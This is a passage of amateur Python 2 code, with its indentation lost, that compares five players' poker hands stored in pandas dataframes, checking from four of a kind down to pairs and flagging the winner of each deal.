if list[0] == list[1] and list[1] == list[2] and list[2] == list[3] \
or list[4] == list[1] and list[1] == list[2] and list[2] == list[3] \
or list[0] == list[4] and list[4] == list[2] and list[2] == list[3] \
or list[0] == list[1] and list[1] == list[4] and list[4] == list[3] \
or list[0] == list[1] and list[1] == list[2] and list[2] == list[4]:
FK = FK + 1
a4 = list[0]
#Evaluate for P5
list[0] = df5.iloc[i * 4 + k - 1, 1]
list[1] = df5.iloc[i * 4 + k - 1, 3]
list[2] = df5.iloc[i * 4 + k - 1, 5]
list[3] = df5.iloc[i * 4 + k - 1, 7]
list[4] = df5.iloc[i * 4 + k - 1, 9]
if list[0] == list[1] and list[1] == list[2] and list[2] == list[3] \
or list[4] == list[1] and list[1] == list[2] and list[2] == list[3] \
or list[0] == list[4] and list[4] == list[2] and list[2] == list[3] \
or list[0] == list[1] and list[1] == list[4] and list[4] == list[3] \
or list[0] == list[1] and list[1] == list[2] and list[2] == list[4]:
FK = FK + 1
a5 = list[0]
#Checking for Four of a kind
if(FK > 0):
print "Four of a kind"
b = max(a1, a2, a3, a4, a5)
if a1 == b:
df1.iloc[i * 4 + k - 1, 14] = 1
if a2 == b:
df2.iloc[i * 4 + k - 1, 14] = 1
if a3 == b:
df3.iloc[i * 4 + k - 1, 14] = 1
if a4 == b:
df4.iloc[i * 4 + k - 1, 14] = 1
if a5 == b:
df5.iloc[i * 4 + k - 1, 14] = 1
else:
#Check for full house
FH = 0
a1i = 0
a1ii = 0
a2i = 0
a2ii = 0
a3i = 0
a3ii = 0
a4i = 0
a4ii = 0
a5i = 0
a5ii = 0
# Evaluate for P1
list[0] = df1.iloc[i * 4 + k - 1, 1]
list[1] = df1.iloc[i * 4 + k - 1, 3]
list[2] = df1.iloc[i * 4 + k - 1, 5]
list[3] = df1.iloc[i * 4 + k - 1, 7]
list[4] = df1.iloc[i * 4 + k - 1, 9]
if list[0] == list[1] and list[1] == list[2] and list[3] == list[4]:
a1i = list[0]
a1ii = list[3]
FH = FH + 1
elif list[0] == list[1] and list[1] == list[3] and list[2] == list[4]:
a1i = list[0]
a1ii = list[4]
FH = FH + 1
elif list[0] == list[1] and list[1] == list[4] and list[3] == list[2]:
a1i = list[0]
a1ii = list[2]
FH = FH + 1
elif list[0] == list[3] and list[3] == list[2] and list[1] == list[4]:
a1i = list[0]
a1ii = list[4]
FH = FH + 1
elif list[0] == list[4] and list[4] == list[2] and list[3] == list[1]:
a1i = list[0]
a1ii = list[1]
FH = FH + 1
elif list[3] == list[1] and list[1] == list[2] and list[0] == list[4]:
a1i = list[3]
a1ii = list[4]
FH = FH + 1
elif list[4] == list[1] and list[1] == list[2] and list[3] == list[0]:
a1i = list[4]
a1ii = list[3]
FH = FH + 1
elif list[0] == list[3] and list[3] == list[4] and list[1] == list[2]:
a1i = list[0]
a1ii = list[1]
FH = FH + 1
elif list[3] == list[1] and list[1] == list[4] and list[2] == list[0]:
a1i = list[3]
a1ii = list[2]
FH = FH + 1
elif list[3] == list[4] and list[4] == list[2] and list[0] == list[1]:
a1i = list[3]
a1ii = list[1]
FH = FH + 1
# Evaluate for P2
list[0] = df2.iloc[i * 4 + k - 1, 1]
list[1] = df2.iloc[i * 4 + k - 1, 3]
list[2] = df2.iloc[i * 4 + k - 1, 5]
list[3] = df2.iloc[i * 4 + k - 1, 7]
list[4] = df2.iloc[i * 4 + k - 1, 9]
if list[0] == list[1] and list[1] == list[2] and list[3] == list[4]:
a2i = list[0]
a2ii = list[3]
FH = FH + 1
elif list[0] == list[1] and list[1] == list[3] and list[2] == list[4]:
a2i = list[0]
a2ii = list[4]
FH = FH + 1
elif list[0] == list[1] and list[1] == list[4] and list[3] == list[2]:
a2i = list[0]
a2ii = list[2]
FH = FH + 1
elif list[0] == list[3] and list[3] == list[2] and list[1] == list[4]:
a2i = list[0]
a2ii = list[4]
FH = FH + 1
elif list[0] == list[4] and list[4] == list[2] and list[3] == list[1]:
a2i = list[0]
a2ii = list[1]
FH = FH + 1
elif list[3] == list[1] and list[1] == list[2] and list[0] == list[4]:
a2i = list[3]
a2ii = list[4]
FH = FH + 1
elif list[4] == list[1] and list[1] == list[2] and list[3] == list[0]:
a2i = list[4]
a2ii = list[3]
FH = FH + 1
elif list[0] == list[3] and list[3] == list[4] and list[1] == list[2]:
a2i = list[0]
a2ii = list[1]
FH = FH + 1
elif list[3] == list[1] and list[1] == list[4] and list[2] == list[0]:
a2i = list[3]
a2ii = list[2]
FH = FH + 1
elif list[3] == list[4] and list[4] == list[2] and list[0] == list[1]:
a2i = list[3]
a2ii = list[1]
FH = FH + 1
# Evaluate for P3
list[0] = df3.iloc[i * 4 + k - 1, 1]
list[1] = df3.iloc[i * 4 + k - 1, 3]
list[2] = df3.iloc[i * 4 + k - 1, 5]
list[3] = df3.iloc[i * 4 + k - 1, 7]
list[4] = df3.iloc[i * 4 + k - 1, 9]
if list[0] == list[1] and list[1] == list[2] and list[3] == list[4]:
a3i = list[0]
a3ii = list[3]
FH = FH + 1
elif list[0] == list[1] and list[1] == list[3] and list[2] == list[4]:
a3i = list[0]
a3ii = list[4]
FH = FH + 1
elif list[0] == list[1] and list[1] == list[4] and list[3] == list[2]:
a3i = list[0]
a3ii = list[2]
FH = FH + 1
elif list[0] == list[3] and list[3] == list[2] and list[1] == list[4]:
a3i = list[0]
a3ii = list[4]
FH = FH + 1
elif list[0] == list[4] and list[4] == list[2] and list[3] == list[1]:
a3i = list[0]
a3ii = list[1]
FH = FH + 1
elif list[3] == list[1] and list[1] == list[2] and list[0] == list[4]:
a3i = list[3]
a3ii = list[4]
FH = FH + 1
elif list[4] == list[1] and list[1] == list[2] and list[3] == list[0]:
a3i = list[4]
a3ii = list[3]
FH = FH + 1
elif list[0] == list[3] and list[3] == list[4] and list[1] == list[2]:
a3i = list[0]
a3ii = list[1]
FH = FH + 1
elif list[3] == list[1] and list[1] == list[4] and list[2] == list[0]:
a3i = list[3]
a3ii = list[2]
FH = FH + 1
elif list[3] == list[4] and list[4] == list[2] and list[0] == list[1]:
a3i = list[3]
a3ii = list[1]
FH = FH + 1
# Evaluate for P4
list[0] = df4.iloc[i * 4 + k - 1, 1]
list[1] = df4.iloc[i * 4 + k - 1, 3]
list[2] = df4.iloc[i * 4 + k - 1, 5]
list[3] = df4.iloc[i * 4 + k - 1, 7]
list[4] = df4.iloc[i * 4 + k - 1, 9]
if list[0] == list[1] and list[1] == list[2] and list[3] == list[4]:
a4i = list[0]
a4ii = list[3]
FH = FH + 1
elif list[0] == list[1] and list[1] == list[3] and list[2] == list[4]:
a4i = list[0]
a4ii = list[4]
FH = FH + 1
elif list[0] == list[1] and list[1] == list[4] and list[3] == list[2]:
a4i = list[0]
a4ii = list[2]
FH = FH + 1
elif list[0] == list[3] and list[3] == list[2] and list[1] == list[4]:
a4i = list[0]
a4ii = list[4]
FH = FH + 1
elif list[0] == list[4] and list[4] == list[2] and list[3] == list[1]:
a4i = list[0]
a4ii = list[1]
FH = FH + 1
elif list[3] == list[1] and list[1] == list[2] and list[0] == list[4]:
a4i = list[3]
a4ii = list[4]
FH = FH + 1
elif list[4] == list[1] and list[1] == list[2] and list[3] == list[0]:
a4i = list[4]
a4ii = list[3]
FH = FH + 1
elif list[0] == list[3] and list[3] == list[4] and list[1] == list[2]:
a4i = list[0]
a4ii = list[1]
FH = FH + 1
elif list[3] == list[1] and list[1] == list[4] and list[2] == list[0]:
a4i = list[3]
a4ii = list[2]
FH = FH + 1
elif list[3] == list[4] and list[4] == list[2] and list[0] == list[1]:
a4i = list[3]
a4ii = list[1]
FH = FH + 1
# Evaluate for P5
list[0] = df5.iloc[i * 4 + k - 1, 1]
list[1] = df5.iloc[i * 4 + k - 1, 3]
list[2] = df5.iloc[i * 4 + k - 1, 5]
list[3] = df5.iloc[i * 4 + k - 1, 7]
list[4] = df5.iloc[i * 4 + k - 1, 9]
if list[0] == list[1] and list[1] == list[2] and list[3] == list[4]:
a5i = list[0]
a5ii = list[3]
FH = FH + 1
elif list[0] == list[1] and list[1] == list[3] and list[2] == list[4]:
a5i = list[0]
a5ii = list[4]
FH = FH + 1
elif list[0] == list[1] and list[1] == list[4] and list[3] == list[2]:
a5i = list[0]
a5ii = list[2]
FH = FH + 1
elif list[0] == list[3] and list[3] == list[2] and list[1] == list[4]:
a5i = list[0]
a5ii = list[4]
FH = FH + 1
elif list[0] == list[4] and list[4] == list[2] and list[3] == list[1]:
a5i = list[0]
a5ii = list[1]
FH = FH + 1
elif list[3] == list[1] and list[1] == list[2] and list[0] == list[4]:
a5i = list[3]
a5ii = list[4]
FH = FH + 1
elif list[4] == list[1] and list[1] == list[2] and list[3] == list[0]:
a5i = list[4]
a5ii = list[3]
FH = FH + 1
elif list[0] == list[3] and list[3] == list[4] and list[1] == list[2]:
a5i = list[0]
a5ii = list[1]
FH = FH + 1
elif list[3] == list[1] and list[1] == list[4] and list[2] == list[0]:
a5i = list[3]
a5ii = list[2]
FH = FH + 1
elif list[3] == list[4] and list[4] == list[2] and list[0] == list[1]:
a5i = list[3]
a5ii = list[1]
FH = FH + 1
#Evaluating for Full House
if (FH > 1):
print "Full House"
b = max(a1i, a2i, a3i, a4i, a5i)
c = 0
if a1i == b:
c = c + 1
elif a2i == b:
c = c + 1
elif a3i == b:
c = c + 1
elif a4i == b:
c = c + 1
elif a5i == b:
c = c + 1
if c > 1:
print "Full House"
b = max(a1ii, a2ii, a3ii, a4ii, a5ii)
if a1ii == b:
df1.iloc[i * 4 + k - 1, 14] = 1
if a2ii == b:
df2.iloc[i * 4 + k - 1, 14] = 1
if a3ii == b:
df3.iloc[i * 4 + k - 1, 14] = 1
if a4ii == b:
df4.iloc[i * 4 + k - 1, 14] = 1
if a5ii == b:
df5.iloc[i * 4 + k - 1, 14] = 1
else:
print "Full House"
b = max(a1i, a2i, a3i, a4i, a5i)
if a1i == b:
df1.iloc[i * 4 + k - 1, 14] = 1
if a2i == b:
df2.iloc[i * 4 + k - 1, 14] = 1
if a3i == b:
df3.iloc[i * 4 + k - 1, 14] = 1
if a4i == b:
df4.iloc[i * 4 + k - 1, 14] = 1
if a5i == b:
df5.iloc[i * 4 + k - 1, 14] = 1
elif (FH == 1):
print "Full House"
b = max(a1i,a2i,a3i,a4i,a5i)
if a1i == b:
df1.iloc[i * 4 + k - 1, 14] = 1
elif a2i == b:
df2.iloc[i * 4 + k - 1, 14] = 1
elif a3i == b:
df3.iloc[i * 4 + k - 1, 14] = 1
elif a4i == b:
df4.iloc[i * 4 + k - 1, 14] = 1
elif a5i == b:
df5.iloc[i * 4 + k - 1, 14] = 1
else:
#Evaluate for Flush
F = 0
a1 = 0
a2 = 0
a3 = 0
a4 = 0
a5 = 0
#Evaluate P1
list[0] = df1.iloc[i * 4 + k - 1, 0]
list[1] = df1.iloc[i * 4 + k - 1, 2]
list[2] = df1.iloc[i * 4 + k - 1, 4]
list[3] = df1.iloc[i * 4 + k - 1, 6]
list[4] = df1.iloc[i * 4 + k - 1, 8]
if list[0] == list[1] and list[1] == list[2] and list[2] == list[3] and list[3] == list[4]:
F = F + 1
a1 = max(df1.iloc[i * 4 + k - 1, 1], df1.iloc[i * 4 + k - 1, 3], df1.iloc[i * 4 + k - 1, 5],
df1.iloc[i * 4 + k - 1, 7], df1.iloc[i * 4 + k - 1, 9])
# Evaluate P2
list[0] = df2.iloc[i * 4 + k - 1, 0]
list[1] = df2.iloc[i * 4 + k - 1, 2]
list[2] = df2.iloc[i * 4 + k - 1, 4]
list[3] = df2.iloc[i * 4 + k - 1, 6]
list[4] = df2.iloc[i * 4 + k - 1, 8]
if list[0] == list[1] and list[1] == list[2] and list[2] == list[3] and list[3] == list[
4]:
F = F + 1
a2 = max(df2.iloc[i * 4 + k - 1, 1], df2.iloc[i * 4 + k - 1, 3], df2.iloc[i * 4 + k - 1, 5],
df2.iloc[i * 4 + k - 1, 7], df2.iloc[i * 4 + k - 1, 9])
# Evaluate P3
list[0] = df3.iloc[i * 4 + k - 1, 0]
list[1] = df3.iloc[i * 4 + k - 1, 2]
list[2] = df3.iloc[i * 4 + k - 1, 4]
list[3] = df3.iloc[i * 4 + k - 1, 6]
list[4] = df3.iloc[i * 4 + k - 1, 8]
if list[0] == list[1] and list[1] == list[2] and list[2] == list[3] and list[3] == \
list[4]:
F = F + 1
a3 = max(df3.iloc[i * 4 + k - 1, 1], df3.iloc[i * 4 + k - 1, 3], df3.iloc[i * 4 + k - 1, 5],
df3.iloc[i * 4 + k - 1, 7], df3.iloc[i * 4 + k - 1, 9])
# Evaluate P4
list[0] = df4.iloc[i * 4 + k - 1, 0]
list[1] = df4.iloc[i * 4 + k - 1, 2]
list[2] = df4.iloc[i * 4 + k - 1, 4]
list[3] = df4.iloc[i * 4 + k - 1, 6]
list[4] = df4.iloc[i * 4 + k - 1, 8]
if list[0] == list[1] and list[1] == list[2] and list[2] == list[3] and list[
3] == list[4]:
F = F + 1
a4 = max(df4.iloc[i * 4 + k - 1, 1], df4.iloc[i * 4 + k - 1, 3], df4.iloc[i * 4 + k - 1, 5],
df4.iloc[i * 4 + k - 1, 7], df4.iloc[i * 4 + k - 1, 9])
# Evaluate P5
list[0] = df5.iloc[i * 4 + k - 1, 0]
list[1] = df5.iloc[i * 4 + k - 1, 2]
list[2] = df5.iloc[i * 4 + k - 1, 4]
list[3] = df5.iloc[i * 4 + k - 1, 6]
list[4] = df5.iloc[i * 4 + k - 1, 8]
if list[0] == list[1] and list[1] == list[2] and list[2] == list[3] and \
list[3] == list[4]:
F = F + 1
a5 = max(df5.iloc[i * 4 + k - 1, 1], df5.iloc[i * 4 + k - 1, 3], df5.iloc[i * 4 + k - 1, 5],
df5.iloc[i * 4 + k - 1, 7], df5.iloc[i * 4 + k - 1, 9])
if F > 0:
print "Flush"
b = max(a1, a2, a3, a4, a5)
if a1 == b:
df1.iloc[i * 4 + k - 1, 14] = 1
elif a2 == b:
df2.iloc[i * 4 + k - 1, 14] = 1
elif a3 == b:
df3.iloc[i * 4 + k - 1, 14] = 1
elif a4 == b:
df4.iloc[i * 4 + k - 1, 14] = 1
elif a5 == b:
df5.iloc[i * 4 + k - 1, 14] = 1
else:
#Check for Straight
SF = 0
a1 = 0
a2 = 0
a3 = 0
a4 = 0
a5 = 0
# P1 Evaluation
# With Ace Low
list[0] = df1.iloc[i * 4 + k - 1, 1]
list[1] = df1.iloc[i * 4 + k - 1, 3]
list[2] = df1.iloc[i * 4 + k - 1, 5]
list[3] = df1.iloc[i * 4 + k - 1, 7]
list[4] = df1.iloc[i * 4 + k - 1, 9]
for m in range(0, 5):
if list[m] == 14:
list[m] = 1
list = np.sort(list).tolist()
if list[0] + 1 == list[1] and list[1] + 1 == list[2] and list[2] + 1 == list[3] and \
list[3] + 1 == list[4]:
a1 = max(list[0], list[1], list[2], list[3], list[4])
SF = SF + 1
# With Ace High
for m in range(0, 5):
if list[m] == 1:
list[m] = 14
list = np.sort(list).tolist()
if list[0] + 1 == list[1] and list[1] + 1 == list[2] and list[2] + 1 == list[3] and \
list[3] + 1 == list[4]:
a1 = max(list[0], list[1], list[2], list[3], list[4])
SF = SF + 1
# P2 Evaluation
# With Ace Low
list[0] = df2.iloc[i * 4 + k - 1, 1]
list[1] = df2.iloc[i * 4 + k - 1, 3]
list[2] = df2.iloc[i * 4 + k - 1, 5]
list[3] = df2.iloc[i * 4 + k - 1, 7]
list[4] = df2.iloc[i * 4 + k - 1, 9]
for m in range(0, 5):
if list[m] == 14:
list[m] = 1
list = np.sort(list).tolist()
if list[0] + 1 == list[1] and list[1] + 1 == list[2] and list[2] + 1 == list[3] and \
list[3] + 1 == list[
4]:
a2 = max(list[0], list[1], list[2], list[3], list[4])
SF = SF + 1
# With Ace High
for m in range(0, 5):
if list[m] == 1:
list[m] = 14
list = np.sort(list).tolist()
if list[0] + 1 == list[1] and list[1] + 1 == list[2] and list[2] + 1 == list[3] and \
list[3] + 1 == list[4]:
a2 = max(list[0], list[1], list[2], list[3], list[4])
SF = SF + 1
# P3 Evaluation
# With Ace Low
list[0] = df3.iloc[i * 4 + k - 1, 1]
list[1] = df3.iloc[i * 4 + k - 1, 3]
list[2] = df3.iloc[i * 4 + k - 1, 5]
list[3] = df3.iloc[i * 4 + k - 1, 7]
list[4] = df3.iloc[i * 4 + k - 1, 9]
for m in range(0, 5):
if list[m] == 14:
list[m] = 1
list = np.sort(list).tolist()
if list[0] + 1 == list[1] and list[1] + 1 == list[2] and list[2] + 1 == list[3] and \
list[3] + 1 == \
list[
4]:
a3 = max(list[0], list[1], list[2], list[3], list[4])
SF = SF + 1
# With Ace High
for m in range(0, 5):
if list[m] == 1:
list[m] = 14
list = np.sort(list).tolist()
if list[0] + 1 == list[1] and list[1] + 1 == list[2] and list[2] + 1 == list[3] and \
list[3] + 1 == list[4]:
a3 = max(list[0], list[1], list[2], list[3], list[4])
SF = SF + 1
# P4 Evaluation
# With Ace Low
list[0] = df4.iloc[i * 4 + k - 1, 1]
list[1] = df4.iloc[i * 4 + k - 1, 3]
list[2] = df4.iloc[i * 4 + k - 1, 5]
list[3] = df4.iloc[i * 4 + k - 1, 7]
list[4] = df4.iloc[i * 4 + k - 1, 9]
for m in range(0, 5):
if list[m] == 14:
list[m] = 1
list = np.sort(list).tolist()
if list[0] + 1 == list[1] and list[1] + 1 == list[2] and list[2] + 1 == list[3] and \
list[3] + 1 == \
list[4]:
a4 = max(list[0], list[1], list[2], list[3], list[4])
SF = SF + 1
# With Ace High
for m in range(0, 5):
if list[m] == 1:
list[m] = 14
list = np.sort(list).tolist()
if list[0] + 1 == list[1] and list[1] + 1 == list[2] and list[2] + 1 == list[3] and \
list[3] + 1 == list[4]:
a4 = max(list[0], list[1], list[2], list[3], list[4])
SF = SF + 1
# P5 Evaluation
# With Ace Low
list[0] = df5.iloc[i * 4 + k - 1, 1]
list[1] = df5.iloc[i * 4 + k - 1, 3]
list[2] = df5.iloc[i * 4 + k - 1, 5]
list[3] = df5.iloc[i * 4 + k - 1, 7]
list[4] = df5.iloc[i * 4 + k - 1, 9]
for m in range(0, 5):
if list[m] == 14:
list[m] = 1
list = np.sort(list).tolist()
if list[0] + 1 == list[1] and list[1] + 1 == list[2] and list[2] + 1 == list[3] and \
list[3] + 1 == \
list[4]:
a5 = max(list[0], list[1], list[2], list[3], list[4])
SF = SF + 1
# With Ace High
for m in range(0, 5):
if list[m] == 1:
list[m] = 14
list = np.sort(list).tolist()
if list[0] + 1 == list[1] and list[1] + 1 == list[2] and list[2] + 1 == list[3] and \
list[3] + 1 == list[4]:
a5 = max(list[0], list[1], list[2], list[3], list[4])
SF = SF + 1
# Check for Straight
if (SF > 0):
print "Straight"
b = max(a1, a2, a3, a4, a5)
if a1 == b:
df1.iloc[i * 4 + k - 1, 14] = 1
if a2 == b:
df2.iloc[i * 4 + k - 1, 14] = 1
if a3 == b:
df3.iloc[i * 4 + k - 1, 14] = 1
if a4 == b:
df4.iloc[i * 4 + k - 1, 14] = 1
if a5 == b:
df5.iloc[i * 4 + k - 1, 14] = 1
else:
#Check for 3 of a kind
FH = 0
a1i = 0
a2i = 0
a3i = 0
a4i = 0
a5i = 0
# Evaluate for P1
list[0] = df1.iloc[i * 4 + k - 1, 1]
list[1] = df1.iloc[i * 4 + k - 1, 3]
list[2] = df1.iloc[i * 4 + k - 1, 5]
list[3] = df1.iloc[i * 4 + k - 1, 7]
list[4] = df1.iloc[i * 4 + k - 1, 9]
if list[0] == list[1] and list[1] == list[2]:
a1i = list[0]
FH = FH + 1
elif list[0] == list[1] and list[1] == list[3]:
a1i = list[0]
FH = FH + 1
elif list[0] == list[1] and list[1] == list[4]:
a1i = list[0]
FH = FH + 1
elif list[0] == list[3] and list[3] == list[2]:
a1i = list[0]
FH = FH + 1
elif list[0] == list[4] and list[4] == list[2]:
a1i = list[0]
FH = FH + 1
elif list[3] == list[1] and list[1] == list[2]:
a1i = list[3]
FH = FH + 1
elif list[4] == list[1] and list[1] == list[2]:
a1i = list[4]
FH = FH + 1
elif list[0] == list[3] and list[3] == list[4]:
a1i = list[0]
FH = FH + 1
elif list[3] == list[1] and list[1] == list[4]:
a1i = list[3]
FH = FH + 1
# Evaluate for P2
list[0] = df2.iloc[i * 4 + k - 1, 1]
list[1] = df2.iloc[i * 4 + k - 1, 3]
list[2] = df2.iloc[i * 4 + k - 1, 5]
list[3] = df2.iloc[i * 4 + k - 1, 7]
list[4] = df2.iloc[i * 4 + k - 1, 9]
if list[0] == list[1] and list[1] == list[2]:
a2i = list[0]
FH = FH + 1
elif list[0] == list[1] and list[1] == list[3]:
a2i = list[0]
FH = FH + 1
elif list[0] == list[1] and list[1] == list[4]:
a2i = list[0]
FH = FH + 1
elif list[0] == list[3] and list[3] == list[2]:
a2i = list[0]
FH = FH + 1
elif list[0] == list[4] and list[4] == list[2]:
a2i = list[0]
FH = FH + 1
elif list[3] == list[1] and list[1] == list[2]:
a2i = list[3]
FH = FH + 1
elif list[4] == list[1] and list[1] == list[2]:
a2i = list[4]
FH = FH + 1
elif list[0] == list[3] and list[3] == list[4]:
a2i = list[0]
FH = FH + 1
elif list[3] == list[1] and list[1] == list[4]:
a2i = list[3]
FH = FH + 1
# Evaluate for P3
list[0] = df3.iloc[i * 4 + k - 1, 1]
list[1] = df3.iloc[i * 4 + k - 1, 3]
list[2] = df3.iloc[i * 4 + k - 1, 5]
list[3] = df3.iloc[i * 4 + k - 1, 7]
list[4] = df3.iloc[i * 4 + k - 1, 9]
if list[0] == list[1] and list[1] == list[2]:
a3i = list[0]
FH = FH + 1
elif list[0] == list[1] and list[1] == list[3]:
a3i = list[0]
FH = FH + 1
elif list[0] == list[1] and list[1] == list[4]:
a3i = list[0]
FH = FH + 1
elif list[0] == list[3] and list[3] == list[2]:
a3i = list[0]
FH = FH + 1
elif list[0] == list[4] and list[4] == list[2]:
a3i = list[0]
FH = FH + 1
elif list[3] == list[1] and list[1] == list[2]:
a3i = list[3]
FH = FH + 1
elif list[4] == list[1] and list[1] == list[2]:
a3i = list[4]
FH = FH + 1
elif list[0] == list[3] and list[3] == list[4]:
a3i = list[0]
FH = FH + 1
elif list[3] == list[1] and list[1] == list[4]:
a3i = list[3]
FH = FH + 1
# Evaluate for P4
list[0] = df4.iloc[i * 4 + k - 1, 1]
list[1] = df4.iloc[i * 4 + k - 1, 3]
list[2] = df4.iloc[i * 4 + k - 1, 5]
list[3] = df4.iloc[i * 4 + k - 1, 7]
list[4] = df4.iloc[i * 4 + k - 1, 9]
if list[0] == list[1] and list[1] == list[2]:
a4i = list[0]
FH = FH + 1
elif list[0] == list[1] and list[1] == list[3]:
a4i = list[0]
FH = FH + 1
elif list[0] == list[1] and list[1] == list[4]:
a4i = list[0]
FH = FH + 1
elif list[0] == list[3] and list[3] == list[2]:
a4i = list[0]
FH = FH + 1
elif list[0] == list[4] and list[4] == list[2]:
a4i = list[0]
FH = FH + 1
elif list[3] == list[1] and list[1] == list[2]:
a4i = list[3]
FH = FH + 1
elif list[4] == list[1] and list[1] == list[2]:
a4i = list[4]
FH = FH + 1
elif list[0] == list[3] and list[3] == list[4]:
a4i = list[0]
FH = FH + 1
elif list[3] == list[1] and list[1] == list[4]:
a4i = list[3]
FH = FH + 1
# Evaluate for P5
list[0] = df5.iloc[i * 4 + k - 1, 1]
list[1] = df5.iloc[i * 4 + k - 1, 3]
list[2] = df5.iloc[i * 4 + k - 1, 5]
list[3] = df5.iloc[i * 4 + k - 1, 7]
list[4] = df5.iloc[i * 4 + k - 1, 9]
if list[0] == list[1] and list[1] == list[2]:
a5i = list[0]
FH = FH + 1
elif list[0] == list[1] and list[1] == list[3]:
a5i = list[0]
FH = FH + 1
elif list[0] == list[1] and list[1] == list[4]:
a5i = list[0]
FH = FH + 1
elif list[0] == list[3] and list[3] == list[2]:
a5i = list[0]
FH = FH + 1
elif list[0] == list[4] and list[4] == list[2]:
a5i = list[0]
FH = FH + 1
elif list[3] == list[1] and list[1] == list[2]:
a5i = list[3]
FH = FH + 1
elif list[4] == list[1] and list[1]:
a5i = list[4]
FH = FH + 1
elif list[0] == list[3] and list[3] == list[4]:
a5i = list[0]
FH = FH + 1
elif list[3] == list[1] and list[1] == list[4]:
a5i = list[3]
FH = FH + 1
# Evaluating for 3 of a kind
if (FH > 0):
print "3 of a kind"
if a1i == a2i and a1i != 0:
b = max (df1.iloc[i * 4 + k - 1, 1], df1.iloc[i * 4 + k - 1, 3],
df2.iloc[i * 4 + k - 1, 1], df2.iloc[i * 4 + k - 1, 3],)
if b == df1.iloc[i * 4 + k - 1, 1] or b == df1.iloc[i * 4 + k - 1, 3]:
df1.iloc[i * 4 + k - 1, 14] = 1
else:
df2.iloc[i * 4 + k - 1, 14] = 1
elif a1i == a3i and a1i != 0:
b = max (df1.iloc[i * 4 + k - 1, 1], df1.iloc[i * 4 + k - 1, 3],
df3.iloc[i * 4 + k - 1, 1], df3.iloc[i * 4 + k - 1, 3],)
if b == df1.iloc[i * 4 + k - 1, 1] or b == df1.iloc[i * 4 + k - 1, 3]:
df1.iloc[i * 4 + k - 1, 14] = 1
else:
df3.iloc[i * 4 + k - 1, 14] = 1
elif a1i == a4i and a1i != 0:
b = max (df1.iloc[i * 4 + k - 1, 1], df1.iloc[i * 4 + k - 1, 3],
df4.iloc[i * 4 + k - 1, 1], df4.iloc[i * 4 + k - 1, 3],)
if b == df1.iloc[i * 4 + k - 1, 1] or b == df1.iloc[i * 4 + k - 1, 3]:
df1.iloc[i * 4 + k - 1, 14] = 1
else:
df4.iloc[i * 4 + k - 1, 14] = 1
elif a1i == a5i and a1i != 0:
b = max (df1.iloc[i * 4 + k - 1, 1], df1.iloc[i * 4 + k - 1, 3],
df5.iloc[i * 4 + k - 1, 1], df5.iloc[i * 4 + k - 1, 3],)
if b == df1.iloc[i * 4 + k - 1, 1] or b == df1.iloc[i * 4 + k - 1, 3]:
df1.iloc[i * 4 + k - 1, 14] = 1
else:
df5.iloc[i * 4 + k - 1, 14] = 1
elif a2i == a3i and a2i != 0:
b = max (df2.iloc[i * 4 + k - 1, 1], df2.iloc[i * 4 + k - 1, 3],
df3.iloc[i * 4 + k - 1, 1], df3.iloc[i * 4 + k - 1, 3],)
if b == df2.iloc[i * 4 + k - 1, 1] or b == df2.iloc[i * 4 + k - 1, 3]:
df2.iloc[i * 4 + k - 1, 14] = 1
else:
df3.iloc[i * 4 + k - 1, 14] = 1
elif a2i == a4i and a2i != 0:
b = max(df2.iloc[i * 4 + k - 1, 1], df2.iloc[i * 4 + k - 1, 3],
df4.iloc[i * 4 + k - 1, 1], df4.iloc[i * 4 + k - 1, 3], )
if b == df2.iloc[i * 4 + k - 1, 1] or b == df2.iloc[i * 4 + k - 1, 3]:
df2.iloc[i * 4 + k - 1, 14] = 1
else:
df4.iloc[i * 4 + k - 1, 14] = 1
elif a2i == a5i and a2i != 0:
b = max(df2.iloc[i * 4 + k - 1, 1], df2.iloc[i * 4 + k - 1, 3],
df5.iloc[i * 4 + k - 1, 1], df5.iloc[i * 4 + k - 1, 3], )
if b == df2.iloc[i * 4 + k - 1, 1] or b == df2.iloc[i * 4 + k - 1, 3]:
df2.iloc[i * 4 + k - 1, 14] = 1
else:
df5.iloc[i * 4 + k - 1, 14] = 1
elif a3i == a4i and a3i != 0:
b = max(df3.iloc[i * 4 + k - 1, 1], df3.iloc[i * 4 + k - 1, 3],
df4.iloc[i * 4 + k - 1, 1], df4.iloc[i * 4 + k - 1, 3], )
if b == df3.iloc[i * 4 + k - 1, 1] or b == df3.iloc[i * 4 + k - 1, 3]:
df3.iloc[i * 4 + k - 1, 14] = 1
else:
df4.iloc[i * 4 + k - 1, 14] = 1
elif a3i == a5i and a3i != 0:
b = max(df3.iloc[i * 4 + k - 1, 1], df3.iloc[i * 4 + k - 1, 3],
df5.iloc[i * 4 + k - 1, 1], df5.iloc[i * 4 + k - 1, 3], )
if b == df3.iloc[i * 4 + k - 1, 1] or b == df3.iloc[i * 4 + k - 1, 3]:
df3.iloc[i * 4 + k - 1, 14] = 1
else:
df5.iloc[i * 4 + k - 1, 14] = 1
elif a4i == a5i and a4i != 0:
b = max(df4.iloc[i * 4 + k - 1, 1], df4.iloc[i * 4 + k - 1, 3],
df5.iloc[i * 4 + k - 1, 1], df5.iloc[i * 4 + k - 1, 3], )
if b == df4.iloc[i * 4 + k - 1, 1] or b == df4.iloc[i * 4 + k - 1, 3]:
df4.iloc[i * 4 + k - 1, 14] = 1
else:
df5.iloc[i * 4 + k - 1, 14] = 1
else:
b = max(a1i, a2i, a3i, a4i, a5i)
if a1i == b:
df1.iloc[i * 4 + k - 1, 14] = 1
elif a2i == b:
df2.iloc[i * 4 + k - 1, 14] = 1
elif a3i == b:
df3.iloc[i * 4 + k - 1, 14] = 1
elif a4i == b:
df4.iloc[i * 4 + k - 1, 14] = 1
elif a5i == b:
df5.iloc[i * 4 + k - 1, 14] = 1
else:
#Evaluate for two pair and one pair
f1 = [0]
f2 = [0]
f3 = [0]
f4 = [0]
f5 = [0]
a1 = [0]
a2 = [0]
a3 = [0]
a4 = [0]
a5 = [0]
Fin = 0
# Evaluate P1
TP1 = 0
list[0] = df1.iloc[i * 4 + k - 1, 1]
list[1] = df1.iloc[i * 4 + k - 1, 3]
list[2] = df1.iloc[i * 4 + k - 1, 5]
list[3] = df1.iloc[i * 4 + k - 1, 7]
list[4] = df1.iloc[i * 4 + k - 1, 9]
if (list[0] == list[2] or list[0] == list[3] or list[
0] == list[4]):
TP1 = TP1 + 1
f1.append(list[0])
if (list[1] == list[2] or list[1] == list[3] or list[1] == list[4]):
TP1 = TP1 + 1
f1.append(list[1])
if (list[0] == list[1]):
TP1 = TP1 + 1
f1.append(list[1])
if TP1 > 1:
f1 = np.sort(f1[::-1]).tolist()
